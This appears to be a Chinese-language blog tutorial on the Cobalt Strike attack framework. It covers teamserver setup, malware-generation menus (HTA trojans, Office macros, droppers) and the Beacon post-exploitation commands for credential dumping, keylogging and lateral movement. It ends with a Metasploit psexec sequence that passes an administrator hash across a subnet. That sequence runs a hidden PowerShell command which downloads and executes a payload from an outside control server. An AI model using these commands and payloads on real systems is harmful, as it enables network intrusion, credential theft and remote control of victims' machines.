玩英雄聯盟的同學都知道，ad基本上都出無盡之刃的，因為他加暴擊，加攻擊，是個神器

而我們玩滲透的，cobaltstrick就是我們的無盡之刃；

無盡之刃

下面來簡單介紹一下cobaltstrike

Cobalt Strike是一款超級好用的滲透測試工具，擁有多種協議主機上線方式，集成了提權，憑據導出，端口轉發，socket代理，office攻擊，文件捆綁，釣魚等多種功能。同時，Cobalt Strike還可以調用Mimikatz等其他知名工具，因此廣受技術大佬的喜愛。

360評價APT-TOCS攻擊盡管看起來已經接近APT水準的攻擊能力，但并非更多依賴攻擊團隊自身的能力，而是依托商業的自動化攻擊測試平臺來達成。

Cobalt Strike是由美國Red Team開發，官網地址：
https://www.cobaltstrike.com

客戶端

客戶端在windows、linux、mac下都可以運行 (需要配置好JAVA環境)。啟動Cobalt Strike客戶端，輸入服務端的IP以及端口、連接密碼，用戶名可以任意設置。

Cobalt Strike分為客戶端和服務端可分布式操作可以協同作戰。但一定要架設在外網上，當然你得知道利用這款工具的目的，主要用于內網滲透以及APT攻擊。

文件架構如下

│ Scripts 用戶安裝的插件

│ Log 每天的日志

│ c2lint 檢查profile的錯誤異常

│ cobaltstrike

│ cobaltstrike.jar 客戶端程序

│ icon.jpg LOGO

│ license.pdf 許可證文件

│ readme.txt

│ releasenotes.txt

│ teamserver 服務端程序

│ update

│ update.jar 更新程序

└─third-party 第三方工具，里面放的vnc dll

服務端盡量選擇linux

安裝步驟

1、cd切換到Cobaltstrike目錄下

2、執行命令 ：teamserver.bat 8.8.8.8 stalker 8.8.8.8 為你的服務器外網IP，stalker為Coabltstrike的客戶端密碼，注意服務端要安裝java環境，還必須配置環境變量；

Applications #應用(顯示受害者機器的應用信息)
Credentials #憑證(通過hashdump或Mimikatz抓取過的密碼都會儲存在這里)
Downloads #下載文件
Event Log #事件日志(主機上線記錄以及團隊協作聊天記錄)
Keystrokes #鍵盤記錄
Proxy Pivots #代理模塊
Screenshots #截圖
Script Console #腳本控制臺(可以加載各種腳本，增強功能https://github.com/rsmudge/cortana-scripts)
Targets #顯示目標主機
Web Log #Web日志

Applications #應用(顯示受害者機器的應用信息)
Credentials #憑證(通過hashdump或Mimikatz抓取過的密碼都會儲存在這里)
Downloads #下載文件
Event Log #事件日志(主機上線記錄以及團隊協作聊天記錄)
Keystrokes #鍵盤記錄
Proxy Pivots #代理模塊
Screenshots #截圖
Script Console #腳本控制臺(可以加載各種腳本，增強功能https://github.com/rsmudge/cortana-scripts)
Targets #顯示目標主機
Web Log #Web日志

html Application #生成惡意的HTA木馬文件
MS Office Macro #生成office宏病毒文件
Payload Generator #生成各種語言版本的payload
USB/CD AutoPlay #生成利用自動播放運行的木馬文件
Windows Dropper #捆綁器，能夠對文檔類進行捆綁
Windows Executable #生成可執行Payload
Windows Executable(S) #把包含payload,Stageless生成可執行文件(包含多數功能)

0. Activity report #活動報告
1. Hosts report #主機報告
2. Indicators of Compromise #威脅報告
3. Sessions report #會話報告
4. Social engineering report #社會工程學報告
5. Tactics, Techniques, and Procedures #策略、技巧和程序  
Reset Data #重置數據
Export Data #導出數據

Beacon

右鍵目標interact來使用Beacon，用它來執行各種命令。

beacon> help

Beacon Commands
===============

Command                   Description
-------                   -----------
argue                     進程參數欺騙
blockdlls                 阻止子進程加載非Microsoft DLL
browserpivot              注入受害者瀏覽器進程
bypassuac                 繞過UAC提升權限
cancel                    取消正在進行的下載
cd                        切換目錄
checkin                   強制讓被控端回連一次
clear                     清除beacon內部的任務隊列
connect                   Connect to a Beacon peer over TCP
covertvpn                 部署Covert VPN客戶端
cp                        復制文件
dcsync                    從DC中提取密碼哈希
desktop                   遠程桌面(VNC)
dllinject                 反射DLL注入進程
dllload                   使用LoadLibrary將DLL加載到進程中
download                  下載文件
downloads                 列出正在進行的文件下載
drives                    列出目標盤符
elevate                   使用exp
execute                   在目標上執行程序(無輸出)
execute-assembly          在目標上內存中執行本地.NET程序
exit                      終止beacon會話
getprivs                  Enable system privileges on current token
getsystem                 嘗試獲取SYSTEM權限
getuid                    獲取用戶ID
hashdump                  轉儲密碼哈希值
help                      幫助
inject                    在注入進程生成會話
jobkill                   結束一個后臺任務
jobs                      列出后臺任務
kerberos_ccache_use       從ccache文件中導入票據應用于此會話
kerberos_ticket_purge     清除當前會話的票據
kerberos_ticket_use       Apply 從ticket文件中導入票據應用于此會話
keylogger                 鍵盤記錄
kill                      結束進程
link                      Connect to a Beacon peer over a named pipe
logonpasswords            使用mimikatz轉儲憑據和哈希值
ls                        列出文件
make_token                創建令牌以傳遞憑據
mimikatz                  運行mimikatz
mkdir                     創建一個目錄
mode DNS                  使用DNS A作為通信通道(僅限DNS beacon)
mode dns-txt              使用DNS TXT作為通信通道(僅限D beacon)
mode dns6                 使用DNS AAAA作為通信通道(僅限DNS beacon)
mode http                 使用HTTP作為通信通道
mv                        移動文件
net                       net命令
note                      備注       
portscan                  進行端口掃描
powerpick                 通過Unmanaged PowerShell執行命令
powershell                通過powershell.exe執行命令
powershell-import         導入powershell腳本
ppid                      Set parent PID for spawned post-ex jobs
ps                        顯示進程列表
psexec                    Use a service to spawn a session on a host
psexec_psh                Use PowerShell to spawn a session on a host
psinject                  在特定進程中執行PowerShell命令
pth                       使用Mimikatz進行傳遞哈希
pwd                       當前目錄位置
reg                       Query the registry
rev2self                  恢復原始令牌
rm                        刪除文件或文件夾
rportfwd                  端口轉發
run                       在目標上執行程序(返回輸出)
runas                     以其他用戶權限執行程序
runasadmin                在高權限下執行程序
runu                      Execute a program under another PID
screenshot                屏幕截圖
setenv                    設置環境變量
shell                     執行cmd命令
shinject                  將shellcode注入進程
shspawn                   啟動一個進程并將shellcode注入其中
sleep                     設置睡眠延遲時間
socks                     啟動SOCKS4代理
socks stop                停止SOCKS4
spawn                     Spawn a session 
spawnas                   Spawn a session as another user
spawnto                   Set executable to spawn processes into
spawnu                    Spawn a session under another PID
ssh                       使用ssh連接遠程主機
ssh-key                   使用密鑰連接遠程主機
steal_token               從進程中竊取令牌
timestomp                 將一個文件的時間戳應用到另一個文件
unlink                    Disconnect from parent Beacon
upload                    上傳文件
wdigest                   使用mimikatz轉儲明文憑據
winrm                     使用WinRM橫向滲透
wmi                       使用WMI橫向滲透

Access

Dump Hashes #獲取hash
Elevate #提權
Golden Ticket #生成黃金票據注入當前會話
Make token #憑證轉換
Run Mimikatz #運行 Mimikatz 
Spawn As #用其他用戶生成Cobalt Strike偵聽器

Explore

Browser Pivot #劫持目標瀏覽器進程
Desktop(VNC) #桌面交互
File Browser #文件瀏覽器
Net View #命令Net View
Port Scan #端口掃描
Process List #進程列表
Screenshot #截圖

利用MSF模塊上線Beacon shell

當通過其它方式拿到了目標內網中某臺Windows機器的本地管理員明文密碼或hash時，可利用Metasploit下
auxiliary/admin/smb/psexec_command模塊，直接上線指定目標機器的Beacon shell。(前提目標即可出網)

先利用CobalStrike生成上線Beacon的powershell。

本地啟動Metasploit，掛上代理，設置psexec_command模塊參數。

msf5 > setg Proxies socks4/5:ip:port

msf5 > use auxiliary/admin/smb/psexec_command

msf5 > set rhosts 192.168.144.0/24

msf5 > set threads 10

msf5 > set smbuser administrator

msf5 > set smbpass aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 #明文、密文均可

msf5 > set command powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://149.28.xx.xx:80/a'))" #上線CS的powershell，目標機存在殺軟需考慮

msf5 > run